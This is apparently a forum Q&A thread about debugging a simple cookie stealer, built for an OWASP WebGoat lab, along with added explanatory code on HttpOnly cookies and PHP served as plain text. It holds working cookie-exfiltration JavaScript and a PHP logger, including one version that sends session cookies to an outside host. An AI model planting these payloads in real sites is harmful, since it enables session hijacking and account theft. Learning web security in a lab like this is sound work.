dilligent

asked on

How to call a PHP script from Javascript in HTML

Hello experts,
 
  I'm trying to construct a basic cookie stealer.  I have Javascript in an HTML doc that calls a PHP file and passes it the value of the session cookie.  Now, I'm able to run the PHP file by itself and it creates the specified file, but when I open the basic HTML doc I only see the text of the PHP file in the browser window, and no text file is written in the PHP dir.  I've been scratching my head for a few hours this morning and am not sure what I'm doing wrong.  I've tried both var assignment and properties such as document.location in the HTML file:

HTML doc:
<script language="Javascript">
 document.location = "http://localhost:8080/WebGoat/cookiestealer.php?cookie=" + escape(document.cookie);
</script>



cookiestealer.php:
<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>



  This is probably something silly I'm overlooking.  Any ideas?
Ray Paseur

We can't really see the sequence of events here, but it may be possible that things are running in an out-of-order sequence.  The PHP scripts are run on the server and are complete before the HTML document is transmitted to the client and the JavaScript gets control.  And some cookies are settable in ways that hide them from JavaScript completely. One possibility might be to use AJAX to send the stolen cookies back to the server.  But whatever you do with something like this, beware that you will likely offend people if you try to gain access to their personally identifiable information without their permission.  In some places, this is a criminal activity with penalties that involve handcuffs and prison time, so tread lightly and do not do this to any client who has not given you explicit permission.  To protect yourself, you should probably insist on written permission!
dilligent

ASKER

This is all in my OWASP WebGoat install on my local VM.  I understand that I can use AJAX, but it was my understanding that my setup should steal my session cookie and write it to a file on my VM.
Ray Paseur

For obvious reasons I am not going to leave these scripts on my server, but this tests out correctly.  Here is the server-side "Ajax" script:
<?php // demo/temp_dilligent_server.php
error_reporting(E_ALL);
date_default_timezone_set('America/Chicago');

// SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html

// START THE OUTPUT BUFFER TO CAPTURE THE var_dump() DISPLAY
ob_start();

// MAKE THE OUTPUT EASY TO READ
echo '<pre>';

// SEND BACK THE DATE...
echo date('r');
echo  PHP_EOL;

// ... AND THE GET-REQUEST VARIABLES
echo 'GET: ';
var_dump($_GET);

// ... AND THE POST-REQUEST VARIABLES
echo 'POST: ';
var_dump($_POST);

echo '</pre>';
echo  PHP_EOL;



And here is the client-side script that sends the data to the server.

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<!-- // SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.min.js"></script>
<script>
$(document).ready(function(){
    /* GRAB ANY COOKIES THAT JAVASCRIPT CAN SEE */
    var cookies = escape(document.cookie);
    /* SEND THE COOKIES TO THE SERVER */
    $.post("temp_dilligent_server.php", {myArg:cookies}, function(response){
        $("#output p#target").html(response);
    });
});
</script>

<title>E-E Q_28563154</title>
</head>
<body>

<noscript>Unable to steal cookies: JavaScript is not enabled!</noscript>

<div   id="output">
   <p  id="static">HERE ARE THE STOLEN COOKIES</p>
   <p  id="target">This element gets the AJAX response</p>
</div>

</body>
</html>


Let me see if I can get it to work with the document.location redirect.  If you haven't tried them, make a search for Google Dev Tools -- very helpful for things like this exercise.
This worked for the front-end script and it echoed the appropriate data:
<script language="Javascript">
document.location = "http://iconoun.com/demo/temp_dilligent_server.php?cookie=" + escape(document.cookie);
</script>


Output:
Sun, 16 Nov 2014 09:52:05 -0600
GET: array(1) {
  ["cookie"]=>
  string(51) "lang=de; PHPSESSID=d89beaeb16ef3d03a85d7ec1aa468133"
}
POST: array(0) {
}


I don't see any material difference between your scripts and mine, so you might want to step through the data visualization process using alert() and echo.
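Two points in Ray's replies can be checked offline: cookies set with the HttpOnly attribute are sent in the Cookie request header but never appear in document.cookie, and the beacon URL built in the scripts above should use encodeURIComponent rather than the deprecated escape(). The following is an added example, not code from the thread; the Set-Cookie lines in it are constructed, the function names are this example's own, and it runs under Node.

```javascript
// Added example (not code from the thread). Shows which cookies script can
// see (HttpOnly ones are sent in the Cookie header but never appear in
// document.cookie) and how to encode the value for the beacon URL.
// Set-Cookie lines and function names below are this example's own.

// Parse one Set-Cookie header value into name, value and attributes.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const cookie = {
    name: eq === -1 ? parts[0] : parts[0].slice(0, eq).trim(),
    value: eq === -1 ? '' : parts[0].slice(eq + 1).trim(),
    httpOnly: false,
    secure: false,
    attributes: {},
  };
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    const val = i === -1 ? true : attr.slice(i + 1).trim();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else cookie.attributes[key] = val;
  }
  return cookie;
}

// What document.cookie would return for these cookies: "name=value" pairs
// joined by "; ", with HttpOnly cookies left out.
function scriptVisibleCookieString(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// The beacon URL the thread's scripts build, but with encodeURIComponent.
// escape() is deprecated and leaves "+", "/", "@", "*", "_", "-" and "."
// unencoded, so a cookie value containing "+" arrives in $_GET as a space.
function buildBeaconUrl(endpoint, cookieString) {
  return `${endpoint}?cookie=${encodeURIComponent(cookieString)}`;
}

// Constructed sample: a Tomcat session cookie (Tomcat 7 and later mark
// JSESSIONID HttpOnly by default), a PHP session cookie and a plain
// preference cookie. Values are made up for this example.
const SAMPLE_SET_COOKIE_HEADERS = [
  'JSESSIONID=FD2AF7912076525990DF420CF1E3D6D3; Path=/WebGoat; HttpOnly',
  'PHPSESSID=d89beaeb16ef3d03a85d7ec1aa468133; Path=/',
  'lang=de; Path=/; Max-Age=3600',
];

const demoCookieString = scriptVisibleCookieString(SAMPLE_SET_COOKIE_HEADERS);
console.log('document.cookie would be:', JSON.stringify(demoCookieString));
console.log(buildBeaconUrl('http://localhost:8080/WebGoat/cookiestealer.php', demoCookieString));
```

Run with node; the JSESSIONID cookie disappears from the visible string while the Cookie header on a real request would still carry it, which is exactly the situation in which a beacon shows up in the access log with an empty or partial cookie parameter.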
dilligent

I don't know what to say.  I see the entry in my access logs, and I see via Dev Tools and Fiddler that the cookie is indeed passed.  The problem is that the PHP doc is treated as text and is not executed.  No file is written, no statements are echoed if the .php file is changed.

Remote Address:127.0.0.1:8080
Request URL:http://localhost:8080/WebGoat/cookiestealer.php?cookie=
Request Method:GET
Status Code:200 OK
Request Headers
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-US,en;q=0.8
Connection:keep-alive
Cookie:JSESSIONID=FD2AF7912076525990DF420CF1E3D6D3
Host:localhost:8080
User-Agent:Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Query String Parameters
cookie:**********************
Response Headers
Accept-Ranges:bytes
Content-Length:174
Date:Sun, 16 Nov 2014 16:59:50 GMT
ETag:W/"174-1416157027159"
Last-Modified:Sun, 16 Nov 2014 16:57:07 GMT
Server:Apache-Coyote/1.1
Dave Baldwin
You can start with the fact that Chrome will not allow a cookie to be set on 'localhost'.  The reason is that 'localhost' is not a unique domain.  The same is true with any page loaded with 'file://'.

My cookie test pages seem to work in Chrome with an IP address thru my web server on this machine.
dilligent

Regardless of whether or not I execute from localhost or change the URL and execute from my host machine while pointing to the VM, I still get no PHP file execution, and instead just get a 200 (or 304 if I repeat without clearing cookies) with the literal response back:

<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>
Dave Baldwin

I copied your code and made adjustments for my web server and it works ok.  I think that you do not have PHP installed on your web server or at least not on the Apache-Coyote/1.1 part of it.
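Dave's diagnosis can be turned into a check that works from the response alone, which is all that Dev Tools or Fiddler shows. A PHP file handed back by a static file handler carries its own source in the body, usually with Last-Modified/ETag derived from the file and, on Tomcat, no Content-Type at all because there is no MIME mapping for .php; an executing handler consumes the open tag and normally answers with text/html. The following is an added example, not code from the thread: the response objects are constructed for it (the body mirrors the cookiestealer.php posted above, the headers mirror the Apache-Coyote dump), and the function name and result fields are this example's own.

```javascript
// Added example (not code from the thread): tell "the PHP ran" apart from
// "the server served the .php file as a static resource" using only the
// response headers and body. Sample responses below are constructed.

function diagnosePhpResponse(response) {
  const headers = {};
  for (const [name, value] of Object.entries(response.headers || {})) {
    headers[name.toLowerCase()] = value;
  }
  const body = response.body || '';
  const hints = [];

  // Decisive signal: a PHP open tag in the body. An executing PHP handler
  // consumes these; a static file handler ships them verbatim (source
  // disclosure, which also means the stealer never wrote its file).
  const sourceDisclosed = /<\?(php\b|=)/.test(body);

  // Supporting signals from the headers.
  const contentType = headers['content-type'];
  if (!contentType) {
    hints.push('no Content-Type: Tomcat has no MIME mapping for .php; mod_php or php-fpm would send text/html');
  } else if (!/^text\/html/i.test(contentType)) {
    hints.push(`Content-Type is ${contentType}, not text/html`);
  }
  if (headers['last-modified'] || headers['etag']) {
    hints.push('Last-Modified/ETag present: static handlers derive these from the file mtime; PHP scripts rarely send them');
  }

  return { sourceDisclosed, hints };
}

// Constructed body: the cookiestealer.php from the thread, LF line endings.
const PHP_SOURCE = [
  '<?php',
  '$file = fopen("cookie.txt","a");',
  "fwrite($file, $_GET['cookie']);",
  'fclose($file);',
  '?>',
  '',
].join('\n');

// Constructed response modelled on the Apache-Coyote headers in the thread
// (no Content-Type, weak ETag and Last-Modified from the file).
const SERVED_AS_TEXT = {
  status: 200,
  headers: {
    'Accept-Ranges': 'bytes',
    'Content-Length': String(Buffer.byteLength(PHP_SOURCE, 'utf8')),
    'ETag': 'W/"89-1416157027159"',
    'Last-Modified': 'Sun, 16 Nov 2014 16:57:07 GMT',
    'Server': 'Apache-Coyote/1.1',
  },
  body: PHP_SOURCE,
};

// Constructed response for the same script when PHP actually runs it:
// the script prints nothing, so the body is empty and PHP's default
// Content-Type is all that comes back.
const EXECUTED = {
  status: 200,
  headers: { 'Content-Type': 'text/html; charset=UTF-8', 'Server': 'Apache' },
  body: '',
};

for (const [label, resp] of [['served as text', SERVED_AS_TEXT], ['executed', EXECUTED]]) {
  const verdict = diagnosePhpResponse(resp);
  console.log(label, '->', verdict.sourceDisclosed ? 'SOURCE DISCLOSED' : 'ok', verdict.hints);
}
```

The body check is the one that matters; the header hints only corroborate it, since an application can set Last-Modified or a non-HTML Content-Type itself. Outside a lab, a .php URL that answers with its own source is a finding in its own right, not just a broken exercise.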
dilligent

Hmmm, so I need it installed on the app server itself, in addition to the app server box?  That is new to me, if so.  I'll look into this and get back to this question.
ASKER CERTIFIED SOLUTION
Dave Baldwin

This solution is only available to members.
dilligent

Thank you.  I'll install PHP on my Tomcat instance, as I'm fairly certain that this is the problem.
Dave Baldwin

You're welcome.